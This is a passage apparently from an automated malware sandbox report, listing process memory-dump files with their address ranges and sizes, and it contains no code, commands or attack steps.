                                                                                                            • memory/2976-194-0x0000000000E10000-0x0000000000E11000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/2976-175-0x00000000006E0000-0x00000000006E1000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/2980-312-0x0000000000000000-mapping.dmp
                                                                                                            • memory/2980-320-0x0000000004140000-0x0000000004184000-memory.dmp
                                                                                                              Filesize

                                                                                                              272KB

                                                                                                            • memory/2988-169-0x0000000000000000-mapping.dmp
                                                                                                            • memory/3032-132-0x0000000000000000-mapping.dmp
                                                                                                            • memory/3156-161-0x0000000002430000-0x00000000025CC000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.6MB

                                                                                                            • memory/3156-153-0x0000000000000000-mapping.dmp
                                                                                                            • memory/3440-144-0x0000000000000000-mapping.dmp
                                                                                                            • memory/3476-309-0x0000000002905000-0x0000000002906000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/3476-290-0x0000000000000000-mapping.dmp
                                                                                                            • memory/3476-303-0x0000000002902000-0x0000000002904000-memory.dmp
                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/3476-294-0x0000000002900000-0x0000000002902000-memory.dmp
                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/3900-147-0x0000000000000000-mapping.dmp
                                                                                                            • memory/3940-115-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4128-319-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4128-341-0x0000000003570000-0x0000000003580000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/4128-352-0x0000000003710000-0x0000000003720000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/4176-266-0x0000000002CA0000-0x0000000002CA2000-memory.dmp
                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/4176-263-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4228-318-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4256-272-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4256-274-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                              Filesize

                                                                                                              88KB

                                                                                                            • memory/4272-367-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4312-337-0x0000000000DC0000-0x0000000000E1C000-memory.dmp
                                                                                                              Filesize

                                                                                                              368KB

                                                                                                            • memory/4312-335-0x0000000000BC8000-0x0000000000CC9000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/4312-333-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4324-298-0x0000000000B10000-0x0000000000B1D000-memory.dmp
                                                                                                              Filesize

                                                                                                              52KB

                                                                                                            • memory/4324-323-0x0000000000400000-0x0000000000448000-memory.dmp
                                                                                                              Filesize

                                                                                                              288KB

                                                                                                            • memory/4324-295-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4388-288-0x00000000028C0000-0x00000000028C2000-memory.dmp
                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/4388-280-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4396-217-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4432-220-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4432-368-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4456-363-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4484-222-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4500-316-0x0000000000401480-mapping.dmp
                                                                                                            • memory/4500-321-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                              Filesize

                                                                                                              284KB

                                                                                                            • memory/4500-315-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                              Filesize

                                                                                                              284KB

                                                                                                            • memory/4504-234-0x0000000003E90000-0x0000000003FDA000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.3MB

                                                                                                            • memory/4504-224-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4504-237-0x0000000000400000-0x0000000003DF0000-memory.dmp
                                                                                                              Filesize

                                                                                                              57.9MB

                                                                                                            • memory/4512-317-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4596-289-0x0000000002BD0000-0x0000000002BD2000-memory.dmp
                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/4596-304-0x0000000002BD4000-0x0000000002BD5000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/4596-285-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4596-301-0x0000000002BD2000-0x0000000002BD4000-memory.dmp
                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/4596-302-0x0000000002BD5000-0x0000000002BD7000-memory.dmp
                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/4608-279-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/4608-276-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4628-359-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4692-238-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4696-325-0x00000001401FBC30-mapping.dmp
                                                                                                            • memory/4696-324-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                              Filesize

                                                                                                              3.5MB

                                                                                                            • memory/4696-326-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                              Filesize

                                                                                                              3.5MB

                                                                                                            • memory/4708-310-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4852-247-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4904-248-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5008-268-0x0000000005E30000-0x0000000005EBD000-memory.dmp
                                                                                                              Filesize

                                                                                                              564KB

                                                                                                            • memory/5008-256-0x0000000004B80000-0x0000000005C82000-memory.dmp
                                                                                                              Filesize

                                                                                                              17.0MB

                                                                                                            • memory/5008-267-0x0000000005D90000-0x0000000005E2F000-memory.dmp
                                                                                                              Filesize

                                                                                                              636KB

                                                                                                            • memory/5008-262-0x0000000010000000-0x0000000011157000-memory.dmp
                                                                                                              Filesize

                                                                                                              17.3MB

                                                                                                            • memory/5008-249-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5048-360-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5060-254-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/5060-252-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5100-261-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/5100-257-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5188-357-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5272-356-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5288-366-0x0000000000402F68-mapping.dmp
                                                                                                            • memory/5380-355-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5532-358-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5612-349-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5712-361-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5748-327-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5820-331-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.0MB

                                                                                                            • memory/5820-328-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.0MB

                                                                                                            • memory/5820-330-0x000001865C2B0000-0x000001865C2C4000-memory.dmp
                                                                                                              Filesize

                                                                                                              80KB

                                                                                                            • memory/5820-329-0x00000001402CA898-mapping.dmp
                                                                                                            • memory/5924-362-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5964-369-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5996-354-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6016-353-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6044-332-0x0000000000000000-mapping.dmp